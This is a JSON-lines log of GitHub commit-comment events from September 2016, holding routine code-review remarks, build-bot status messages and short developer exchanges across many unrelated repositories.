{"id":"4642344191","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19238349,"position":45,"line":24,"path":"app.py","commit_id":"64fdac297217a4fd1c56b546b55ebfb0dfb572ef","created_at":"2016-09-30T09:18:03Z","updated_at":"2016-09-30T09:18:03Z","body":"remove all unnecessary comments and new lines in here and the other class"}},"created_at":"2016-09-30T09:18:03Z"}
{"id":"4642350235","type":"CommitCommentEvent","actor":{"login":"thunderrabbit"},"repo":{"name":"geerlingguy/ansible-role-apache-php-fpm"},"payload":{"comment":{"id":19238354,"position":31,"line":31,"path":"README.md","commit_id":"f35e1b5f6576bb427ee4764f215dfa06b7823371","created_at":"2016-09-30T09:19:24Z","updated_at":"2016-09-30T09:19:24Z","body":"I think this line should be `apache-php-fpm` instead"}},"created_at":"2016-09-30T09:19:24Z"}
{"id":"4642350430","type":"CommitCommentEvent","actor":{"login":"michelgotta"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":19238355,"position":null,"line":null,"path":null,"commit_id":"ba136624415f0315a3b7522c3389232c230d0982","created_at":"2016-09-30T09:19:26Z","updated_at":"2016-09-30T09:19:26Z","body":"The `antwar-prevnext-plugin` in version 0.8.1-alpha.0fa14843 breaks. index.js on line 3:\r\n`module.exports = function (o = {}) {`\r\n\r\nShould be:\r\n```\r\n…\r\nmodule.exports = function(o) {\r\n  o = o || {};\r\n…\r\n```"}},"created_at":"2016-09-30T09:19:26Z"}
{"id":"4642352065","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19238359,"position":null,"line":null,"path":null,"commit_id":"d1d609ec83d6c44a323086e5fd5bc0b6c63ff774","created_at":"2016-09-30T09:19:49Z","updated_at":"2016-09-30T09:19:49Z","body":"Sample comment"}},"created_at":"2016-09-30T09:19:49Z"}
{"id":"4642354424","type":"CommitCommentEvent","actor":{"login":"HellGore"},"repo":{"name":"CasparCG/Server"},"payload":{"comment":{"id":19238366,"position":null,"line":null,"path":null,"commit_id":"61974506572c47b0650c4b5bfa65cd18621d5fec","created_at":"2016-09-30T09:20:18Z","updated_at":"2016-09-30T09:20:18Z","body":"Of course I do. That's why I implemented support for Linux :)"}},"created_at":"2016-09-30T09:20:18Z"}
{"id":"4642359441","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238377,"position":14,"line":14,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/ChannelGroupIdSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:21:23Z","updated_at":"2016-09-30T09:21:23Z","body":"private final"}},"created_at":"2016-09-30T09:21:23Z"}
{"id":"4642361121","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238381,"position":14,"line":14,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/ChannelGroupIdSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:21:45Z","updated_at":"2016-09-30T09:21:45Z","body":"private final"}},"created_at":"2016-09-30T09:21:45Z"}
{"id":"4642362532","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238384,"position":15,"line":15,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/ChannelGroupIdSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:22:04Z","updated_at":"2016-09-30T09:22:04Z","body":"Constructor should be private"}},"created_at":"2016-09-30T09:22:04Z"}
{"id":"4642363236","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19238386,"position":null,"line":null,"path":null,"commit_id":"88a05c8bad7ecaa418f98623c253f06dcbb72541","created_at":"2016-09-30T09:22:13Z","updated_at":"2016-09-30T09:22:13Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33733/testReport/) for this commit**"}},"created_at":"2016-09-30T09:22:13Z"}
{"id":"4642363353","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238387,"position":15,"line":15,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/ChannelGroupIdSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:22:15Z","updated_at":"2016-09-30T09:22:15Z","body":"And have a static factory method"}},"created_at":"2016-09-30T09:22:15Z"}
{"id":"4642364528","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238390,"position":16,"line":16,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/ChannelGroupIdSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:22:31Z","updated_at":"2016-09-30T09:22:31Z","body":"checkNotNull"}},"created_at":"2016-09-30T09:22:31Z"}
{"id":"4642366781","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238394,"position":11,"line":12,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/IdentificationSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:23:00Z","updated_at":"2016-09-30T09:23:00Z","body":"final"}},"created_at":"2016-09-30T09:23:00Z"}
{"id":"4642367984","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238399,"position":14,"line":14,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/IdentificationSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:23:16Z","updated_at":"2016-09-30T09:23:16Z","body":"Constructor should be private"}},"created_at":"2016-09-30T09:23:16Z"}
{"id":"4642369479","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19238401,"position":149,"line":149,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T09:23:34Z","updated_at":"2016-09-30T09:23:34Z","body":"var data = {}; --- 这个是初始化操作，还是有必要的；\r\n如果不进行初始化，直接data = {pn: pn, rn: rn } ，会创建一个全局变量了"}},"created_at":"2016-09-30T09:23:34Z"}
{"id":"4642370445","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238402,"position":17,"line":16,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/IdentificationSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:23:47Z","updated_at":"2016-09-30T09:23:47Z","body":"For consistency with the other annotation it's better to pass the `IdSummaryWriter` in so that both annotations are created the same way"}},"created_at":"2016-09-30T09:23:47Z"}
{"id":"4642372796","type":"CommitCommentEvent","actor":{"login":"van562"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19238406,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T09:24:17Z","updated_at":"2016-09-30T09:24:17Z","body":"Hey Andrea,\r\nI'm doing a senior project and my topic is  on face recognition using neural network. I want my project to be small, but challenging.  I want to do something similar like your project. I hope you could help me out. \r\n\r\nVan"}},"created_at":"2016-09-30T09:24:17Z"}
{"id":"4642374237","type":"CommitCommentEvent","actor":{"login":"masone"},"repo":{"name":"upfrontIO/livingdocs-docker"},"payload":{"comment":{"id":19238407,"position":4,"line":15,"path":"deploy/docker-compose.yml","commit_id":"d62070cb2e8edb25456365af17dccfa466f517d4","created_at":"2016-09-30T09:24:36Z","updated_at":"2016-09-30T09:24:36Z","body":"Except that it does. The baseHost for a branch would for example be `mybranch.rancher.livingdocs.docker.io`\r\nhttps://github.com/upfrontIO/livingdocs-docker/blob/a58883034d663ad31e3c1ac1adb443876ea05d3f/bin/deploy.js#L12"}},"created_at":"2016-09-30T09:24:36Z"}
{"id":"4642374594","type":"CommitCommentEvent","actor":{"login":"1030310877"},"repo":{"name":"1030310877/AndHuber"},"payload":{"comment":{"id":19238408,"position":null,"line":null,"path":null,"commit_id":"826f249a4cd5660c84ad447104862fb0dcd61b4e","created_at":"2016-09-30T09:24:41Z","updated_at":"2016-09-30T09:24:41Z","body":"测试一下"}},"created_at":"2016-09-30T09:24:41Z"}
{"id":"4642375045","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19238409,"position":6,"line":1294,"path":"src/main/blackbox/blackbox.c","commit_id":"16ceed942b09fbe02ec523484dd4f758ec95a842","created_at":"2016-09-30T09:24:46Z","updated_at":"2016-09-30T09:24:46Z","body":"Yes if you dont mind just propose a PR to way you would like to have it"}},"created_at":"2016-09-30T09:24:46Z"}
{"id":"4642375534","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19238413,"position":9,"line":153,"path":"xwiki-platform-core/xwiki-platform-rendering/xwiki-platform-rendering-macros/xwiki-platform-rendering-macro-context/src/main/java/org/xwiki/rendering/internal/macro/context/ContextMacro.java","commit_id":"2eee97c7196cd54bc3b3475e94e43566ce92dd88","created_at":"2016-09-30T09:24:53Z","updated_at":"2016-09-30T09:24:53Z","body":"Yes, good catch, thanks!"}},"created_at":"2016-09-30T09:24:53Z"}
{"id":"4642377309","type":"CommitCommentEvent","actor":{"login":"minhchienwikipedia"},"repo":{"name":"minhchienwikipedia/react-native"},"payload":{"comment":{"id":19238415,"position":9,"line":9,"path":"Project09/component/heroesView.js","commit_id":"6747e986fc7d40d66473df7afd4c4cb7d18a8cf0","created_at":"2016-09-30T09:25:15Z","updated_at":"2016-09-30T09:25:15Z","body":"Vâng ạ, e sẽ chú ý comment"}},"created_at":"2016-09-30T09:25:15Z"}
{"id":"4642377737","type":"CommitCommentEvent","actor":{"login":"nikolai-b"},"repo":{"name":"npct/pct-shiny"},"payload":{"comment":{"id":19238417,"position":23,"line":23,"path":"scripts/mapgen.R","commit_id":"f5d11719feb8b53ab925cdb21d0c9e446f6d1a0a","created_at":"2016-09-30T09:25:20Z","updated_at":"2016-09-30T09:25:20Z","body":"@Robinlovelace would you mind doing this in a separate commit as it is not \"Updates in the readme\"?\r\nI was trying to find the original script that generates `regions.geojson` but this appears to just be loading saved in bigdata, any ideas where it came from originally?"}},"created_at":"2016-09-30T09:25:20Z"}
{"id":"4642378310","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":19238419,"position":17,"line":167,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/ColorLegend/Controls/ColorLegend.cs","commit_id":"4c8c805d0de510a9a7e6115038dc7c83f1a30816","created_at":"2016-09-30T09:25:27Z","updated_at":"2016-09-30T09:25:27Z","body":"That's what I am trying to say in my first comment, that's making the name of the dependency property registration different than the wrappers, so it's better not to change that."}},"created_at":"2016-09-30T09:25:27Z"}
{"id":"4642380092","type":"CommitCommentEvent","actor":{"login":"pasmax2"},"repo":{"name":"ts-x/TSX-RP"},"payload":{"comment":{"id":19238421,"position":null,"line":null,"path":null,"commit_id":"f7c83cb4fe61c4b11e5543bf45664b27a2676fe7","created_at":"2016-09-30T09:25:51Z","updated_at":"2016-09-30T09:25:51Z","body":":P"}},"created_at":"2016-09-30T09:25:51Z"}
{"id":"4642381000","type":"CommitCommentEvent","actor":{"login":"GaryKeeble"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19238424,"position":6,"line":1294,"path":"src/main/blackbox/blackbox.c","commit_id":"16ceed942b09fbe02ec523484dd4f758ec95a842","created_at":"2016-09-30T09:26:02Z","updated_at":"2016-09-30T09:26:02Z","body":"Sure, no problem :-)"}},"created_at":"2016-09-30T09:26:02Z"}
{"id":"4642383448","type":"CommitCommentEvent","actor":{"login":"Chronophobe"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19238428,"position":8,"line":37,"path":"Week4/ahmed/Exercise2.hs","commit_id":"45cd7fe7e6b127c9bfec7a0594d38829d51855dd","created_at":"2016-09-30T09:26:37Z","updated_at":"2016-09-30T09:26:37Z","body":"Aren't you building the same list twice here? "}},"created_at":"2016-09-30T09:26:37Z"}
{"id":"4642383737","type":"CommitCommentEvent","actor":{"login":"Haroenv"},"repo":{"name":"CSSclasses/CSSclasses"},"payload":{"comment":{"id":19238429,"position":null,"line":null,"path":null,"commit_id":"be77eda0c6ed4c459a98499e83e4a2613af50a3c","created_at":"2016-09-30T09:26:40Z","updated_at":"2016-09-30T09:26:40Z","body":"👍 "}},"created_at":"2016-09-30T09:26:40Z"}
{"id":"4642388402","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19238433,"position":45,"line":24,"path":"app.py","commit_id":"64fdac297217a4fd1c56b546b55ebfb0dfb572ef","created_at":"2016-09-30T09:27:40Z","updated_at":"2016-09-30T09:27:40Z","body":"Please instead having comment like that, create a test for this flask service #4"}},"created_at":"2016-09-30T09:27:40Z"}
{"id":"4642389815","type":"CommitCommentEvent","actor":{"login":"TheNeikos"},"repo":{"name":"matthiasbeyer/imag"},"payload":{"comment":{"id":19238435,"position":5,"line":670,"path":"libimagstore/src/store.rs","commit_id":"caa214f1bdcdf29f20bd818ed997b3f4eada64db","created_at":"2016-09-30T09:27:59Z","updated_at":"2016-09-30T09:27:59Z","body":"So if we currently do not have a key in the store we throw an error of it already being borrowed?"}},"created_at":"2016-09-30T09:27:59Z"}
{"id":"4642391251","type":"CommitCommentEvent","actor":{"login":"bebraw"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":19238436,"position":null,"line":null,"path":null,"commit_id":"ba136624415f0315a3b7522c3389232c230d0982","created_at":"2016-09-30T09:28:18Z","updated_at":"2016-09-30T09:28:18Z","body":"@michelgotta Thanks. I changed it that way. People are really keen to replace antwar with something else. I think we'll see three PRs for that in the next weeks."}},"created_at":"2016-09-30T09:28:18Z"}
{"id":"4642391777","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19238439,"position":366,"line":366,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T09:28:25Z","updated_at":"2016-09-30T09:28:25Z","body":"当this.$mod.length == 0时，执行reload函数，此时后面添加html的操作就不会执行，所以这部分代码应当提前到定义html之前进行判断"}},"created_at":"2016-09-30T09:28:25Z"}
{"id":"4642394894","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19238445,"position":null,"line":null,"path":null,"commit_id":"83260fec79ca32e8e8ede26c38c818691d3a9f63","created_at":"2016-09-30T09:29:05Z","updated_at":"2016-09-30T09:29:05Z","body":"Also, did you mean to remove the interface/forms/eye_mag/js/shorthand_eye.js include? (at this point, that script is no longer being used by your form)"}},"created_at":"2016-09-30T09:29:05Z"}
{"id":"4642396122","type":"CommitCommentEvent","actor":{"login":"michelgotta"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":19238447,"position":null,"line":null,"path":null,"commit_id":"ba136624415f0315a3b7522c3389232c230d0982","created_at":"2016-09-30T09:29:21Z","updated_at":"2016-09-30T09:29:21Z","body":"Changed the versions: https://github.com/webpack/webpack.js.org/pull/199"}},"created_at":"2016-09-30T09:29:21Z"}
{"id":"4642397711","type":"CommitCommentEvent","actor":{"login":"bebraw"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":19238448,"position":null,"line":null,"path":null,"commit_id":"ba136624415f0315a3b7522c3389232c230d0982","created_at":"2016-09-30T09:29:42Z","updated_at":"2016-09-30T09:29:42Z","body":"Yeah. I just pushed a fix."}},"created_at":"2016-09-30T09:29:42Z"}
{"id":"4642397894","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/exoFrame"},"payload":{"comment":{"id":19238449,"position":null,"line":null,"path":null,"commit_id":"4acdcd525f2c0eeeb532c48e91c49c4c6897fe9e","created_at":"2016-09-30T09:29:44Z","updated_at":"2016-09-30T09:29:44Z","body":"dsqfqdsfsq"}},"created_at":"2016-09-30T09:29:44Z"}
{"id":"4642400288","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"Huluti/debreate"},"payload":{"comment":{"id":19238453,"position":null,"line":null,"path":null,"commit_id":"1b7265874fc81143601a07cf4a821c06c97eec2c","created_at":"2016-09-30T09:30:11Z","updated_at":"2016-09-30T09:30:11Z","body":"Patched in at [9dbc842](https://github.com/AntumDeluge/debreate/commit/9dbc842)."}},"created_at":"2016-09-30T09:30:11Z"}
{"id":"4642404488","type":"CommitCommentEvent","actor":{"login":"shtripat"},"repo":{"name":"nnDarshan/gluster_bridge"},"payload":{"comment":{"id":19238456,"position":null,"line":null,"path":null,"commit_id":"68b0b52fcddab2fa576d104953b1299d6194994c","created_at":"2016-09-30T09:31:04Z","updated_at":"2016-09-30T09:31:04Z","body":"Looks good. +1"}},"created_at":"2016-09-30T09:31:04Z"}
{"id":"4642411293","type":"CommitCommentEvent","actor":{"login":"tchorzewski1991"},"repo":{"name":"razrfly/recordtemple"},"payload":{"comment":{"id":19238465,"position":87,"line":61,"path":"app/models/record.rb","commit_id":"4033db57085d7de3853003831203ec64d21b2cf9","created_at":"2016-09-30T09:32:31Z","updated_at":"2016-09-30T09:32:31Z","body":"@holden please check all commented methods at the bottom of the record model - I am curious if these could be deleted"}},"created_at":"2016-09-30T09:32:31Z"}
{"id":"4642412773","type":"CommitCommentEvent","actor":{"login":"4u7"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19238466,"position":57,"line":2128,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"3731f2ff2bbc53b1708660e72aa98b6a9b5603ec","created_at":"2016-09-30T09:32:49Z","updated_at":"2016-09-30T09:32:49Z","body":"I'm trying to avoid diagnostic message: `Argument 'start' might be null`. Should I ignore diagnostic or suppress it? \r\nAlso `Location.create(file)` does same thing as `Location.create(file, null, null)`, so maybe start parameter of `Location.create` should be `@Nullable`?"}},"created_at":"2016-09-30T09:32:49Z"}
{"id":"4642413460","type":"CommitCommentEvent","actor":{"login":"JoseAlcerreca"},"repo":{"name":"b1lb0/android-architecture"},"payload":{"comment":{"id":19238468,"position":null,"line":null,"path":null,"commit_id":"c1a01c6a0882857464138548567c7c36ecdc5c4a","created_at":"2016-09-30T09:32:57Z","updated_at":"2016-09-30T09:32:57Z","body":"Hi Tobia, not sure what you mean. The tests pass and everything looks normal to me. Do you get an error?"}},"created_at":"2016-09-30T09:32:57Z"}
{"id":"4642414885","type":"CommitCommentEvent","actor":{"login":"joaoe"},"repo":{"name":"Ensembl/VEP_plugins"},"payload":{"comment":{"id":19238469,"position":5,"line":74,"path":"ProteinSeqs.pm","commit_id":"76acff0ae95a47276ce369531e8fe14a25888c43","created_at":"2016-09-30T09:33:15Z","updated_at":"2016-09-30T09:33:15Z","body":"This should perhaps use `warning_msg($config, ...)` right?"}},"created_at":"2016-09-30T09:33:15Z"}
{"id":"4642417866","type":"CommitCommentEvent","actor":{"login":"fedir-petrukhin"},"repo":{"name":"fedir-petrukhin/bizcardscanner"},"payload":{"comment":{"id":19238473,"position":null,"line":null,"path":null,"commit_id":"fa3d5566af7c86f89f4e090899660bf5c2dd887b","created_at":"2016-09-30T09:33:55Z","updated_at":"2016-09-30T09:33:55Z","body":"merge"}},"created_at":"2016-09-30T09:33:55Z"}
{"id":"4642421280","type":"CommitCommentEvent","actor":{"login":"ashrafsarhan"},"repo":{"name":"ashrafsarhan/adv-r"},"payload":{"comment":{"id":19238476,"position":7,"line":22,"path":"spotifyr/R/auth.R","commit_id":"a3b890871ee30ec27081a30e9fb790008f50508d","created_at":"2016-09-30T09:34:39Z","updated_at":"2016-09-30T09:34:39Z","body":"@Mattias99  We can use `logging` package as a future optimization."}},"created_at":"2016-09-30T09:34:39Z"}
{"id":"4642422557","type":"CommitCommentEvent","actor":{"login":"scop"},"repo":{"name":"Lukasa/urllib3"},"payload":{"comment":{"id":19238478,"position":4,"line":13,"path":"CHANGES.rst","commit_id":"5b6bad0e19d000563482fecf37310e7cd6735691","created_at":"2016-09-30T09:34:57Z","updated_at":"2016-09-30T09:34:57Z","body":"...and in Retry-After :)"}},"created_at":"2016-09-30T09:34:57Z"}
{"id":"4642424053","type":"CommitCommentEvent","actor":{"login":"4u7"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19238480,"position":127,"line":2575,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"1dc6264468b92f94f9535b49e668784258ed818f","created_at":"2016-09-30T09:35:18Z","updated_at":"2016-09-30T09:35:18Z","body":"I think SmthFinder.found() makes more sense"}},"created_at":"2016-09-30T09:35:18Z"}
{"id":"4642426559","type":"CommitCommentEvent","actor":{"login":"schnubor"},"repo":{"name":"styladev/octobercms"},"payload":{"comment":{"id":19238485,"position":null,"line":null,"path":null,"commit_id":"b0eaf216c1c3676de99a6e69b38e3113db0938c7","created_at":"2016-09-30T09:35:48Z","updated_at":"2016-09-30T09:35:48Z","body":"Rolled out for news.pkz.ch"}},"created_at":"2016-09-30T09:35:48Z"}
{"id":"4642440902","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19238512,"position":90,"line":90,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T09:38:51Z","updated_at":"2016-09-30T09:38:51Z","body":"initialize里面不是定义了this.url吗，为什么还要设置一次呢。"}},"created_at":"2016-09-30T09:38:51Z"}
{"id":"4642443959","type":"CommitCommentEvent","actor":{"login":"ShivamGuptaHat"},"repo":{"name":"ShivamGuptaHat/website-project"},"payload":{"comment":{"id":19238523,"position":null,"line":null,"path":null,"commit_id":"ff8ec2f48ae75e38a10d9e23be965d2ab2383e77","created_at":"2016-09-30T09:39:32Z","updated_at":"2016-09-30T09:39:32Z","body":"thanks for your help."}},"created_at":"2016-09-30T09:39:32Z"}
{"id":"4642452576","type":"CommitCommentEvent","actor":{"login":"osahyoun"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19238540,"position":2,"line":2,"path":"app/services/auth_token_verifier.rb","commit_id":"c147ac6652f3cab2b2acafcf2873172ba65c5477","created_at":"2016-09-30T09:41:24Z","updated_at":"2016-09-30T09:41:24Z","body":"@Tuuleh it was the specs that lead the refactoring - I mainly just renamed things so I could better understand what needed to be tested.\r\n\r\nI don't think the member is required. Your token is a 32 character randomly generated base64 string. It's secure enough and there's no chance that two members might have the same token generated for them. Dropping the email also means we have less code to manage when generating the email.\r\n\r\nNot sure what the value is in logging when:\r\n\r\na) member has already confirmed their account\r\nb) member has an invalid token\r\n\r\nI think for (a) we should direct the member to the dashboard so that they can log in. For (b) we should ask if the member wants to have their confirmation email resent.\r\n\r\nOf course, happy to put logging back in if you think we might get some value out of it."}},"created_at":"2016-09-30T09:41:24Z"}
{"id":"4642458078","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19238546,"position":null,"line":null,"path":null,"commit_id":"42385fad099844239320daae109ff96ab8c78025","created_at":"2016-09-30T09:42:36Z","updated_at":"2016-09-30T09:42:36Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.7+2](http://build.prxm.it:8813/viewLog.html?buildId=3683&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:57"}},"created_at":"2016-09-30T09:42:36Z"}
{"id":"4642458305","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19238548,"position":null,"line":null,"path":null,"commit_id":"42385fad099844239320daae109ff96ab8c78025","created_at":"2016-09-30T09:42:39Z","updated_at":"2016-09-30T09:42:39Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.7+2](http://build.prxm.it:8813/viewLog.html?buildId=3683&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:57"}},"created_at":"2016-09-30T09:42:39Z"}
{"id":"4642463539","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19238555,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-30T09:43:47Z","updated_at":"2016-09-30T09:43:47Z","body":"I try , but there isn't any Alert.... 😢"}},"created_at":"2016-09-30T09:43:47Z"}
{"id":"4642464065","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19238557,"position":2,"line":2,"path":"cura/Settings/ProfilesPageModel.py","commit_id":"2742a4ef65c28df22ceeb8c949f229f7558c3b85","created_at":"2016-09-30T09:43:54Z","updated_at":"2016-09-30T09:43:54Z","body":"I'm more interested in the license Cura is released with. Fixed for you with 257aff7c00aa49763fedb6e7b968b34e839f8c05."}},"created_at":"2016-09-30T09:43:54Z"}
{"id":"4642465439","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19238562,"position":151,"line":151,"path":"footparse/betexplorer.py","commit_id":"8c5f5572af8f2530ce8668bd4da482d1f56ec1b5","created_at":"2016-09-30T09:44:13Z","updated_at":"2016-09-30T09:44:13Z","body":"This is an attempt to have one quick and easy way to scrape the odds given a competition page. For the case of bet explorer, as we need some requests in the middle of the scraping, there is no easy way to decouple the scraping from the source of the file (from disk or from url)."}},"created_at":"2016-09-30T09:44:13Z"}
{"id":"4642466232","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238563,"position":23,"line":23,"path":"atlas-api/src/main/java/org/atlasapi/output/annotation/ChannelGroupIdSummaryAnnotation.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T09:44:24Z","updated_at":"2016-09-30T09:44:24Z","body":"`throws IOException` is in the method signature for `write` in the `OutputAnnotation` interface. Normally we want to avoid checked exceptions, but in this case it's better to be consistent with the interface, remove the try-catch and add `throws IOException` to the method signature.\r\n\r\nReason is, because the interface already is declaring that exception whoever uses any `OutputAnnotation` already has to deal with IOException so you don't gain anything by dealing with it here."}},"created_at":"2016-09-30T09:44:24Z"}
{"id":"4642471795","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19238568,"position":32,"line":32,"path":"footparse/betexplorer.py","commit_id":"8c5f5572af8f2530ce8668bd4da482d1f56ec1b5","created_at":"2016-09-30T09:45:33Z","updated_at":"2016-09-30T09:45:33Z","body":"These are the parts I'm less sure about. It makes a requests to get some HTML that doesn't exist at first, but the original file might come from the disk."}},"created_at":"2016-09-30T09:45:33Z"}
{"id":"4642471950","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_4"},"payload":{"comment":{"id":19238570,"position":null,"line":null,"path":null,"commit_id":"579e25a13aec54801fd2f552061a52b24df28884","created_at":"2016-09-30T09:45:35Z","updated_at":"2016-09-30T09:45:35Z","body":"I fixed the bug that was not allowing users to login after the registration by email. Now the login by email as well as by social networks are fully working. "}},"created_at":"2016-09-30T09:45:35Z"}
{"id":"4642472601","type":"CommitCommentEvent","actor":{"login":"Lukasa"},"repo":{"name":"Lukasa/urllib3"},"payload":{"comment":{"id":19238572,"position":4,"line":13,"path":"CHANGES.rst","commit_id":"5b6bad0e19d000563482fecf37310e7cd6735691","created_at":"2016-09-30T09:45:43Z","updated_at":"2016-09-30T09:45:43Z","body":"Given that Retry-After hasn't been released yet, we don't need an extra changelog note for it: people can just assume we got it right the first time, despite all evidence to the contrary. :wink:"}},"created_at":"2016-09-30T09:45:43Z"}
{"id":"4642483526","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19238593,"position":null,"line":null,"path":null,"commit_id":"4021d98e6508cac20ae4320e292da180bd6595e9","created_at":"2016-09-30T09:48:04Z","updated_at":"2016-09-30T09:48:04Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.86](http://build.prxm.it:8813/viewLog.html?buildId=3684&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:42"}},"created_at":"2016-09-30T09:48:04Z"}
